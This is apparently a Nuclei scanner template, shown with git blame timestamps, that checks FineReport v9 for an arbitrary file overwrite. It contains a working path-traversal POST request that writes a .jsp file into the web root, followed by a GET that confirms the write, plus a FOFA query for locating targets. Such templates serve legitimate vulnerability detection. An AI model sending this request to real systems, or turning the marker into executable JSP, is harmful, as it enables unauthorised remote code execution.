nuclei-templates/http/vulnerabilities/finereport/fine-report-v9-file-upload....

35 lines
862 B
YAML
Raw Normal View History

2023-08-22 11:27:51 +00:00
id: fine-report-v9-file-upload
info:
name: FineReport v9 Arbitrary File Overwrite
author: SleepingBag945
severity: critical
reference:
2023-08-22 11:33:04 +00:00
- https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.
metadata:
fofa-query: app="帆软-FineReport"
2023-08-22 11:31:02 +00:00
tags: finereport,fileupload,intrusive
2023-08-22 11:27:51 +00:00
variables:
string: '{{rand_base(8, "abc")}}'
2023-08-23 13:20:56 +00:00
filename: '{{rand_base(8)}}'
2023-08-22 11:27:51 +00:00
http:
- raw:
- |
2023-08-23 13:20:56 +00:00
POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/{{filename}}.jsp HTTP/1.1
2023-08-22 11:27:51 +00:00
Host: {{Hostname}}
Content-Type: text/xml;charset=UTF-8
{"__CONTENT__":"{{string}}","__CHARSET__":"UTF-8"}
- |
2023-08-23 13:20:56 +00:00
GET /WebReport/{{filename}}.jsp HTTP/1.1
2023-08-22 11:27:51 +00:00
Host: {{Hostname}}
matchers:
- type: word
part: body_2
words:
- "{{string}}"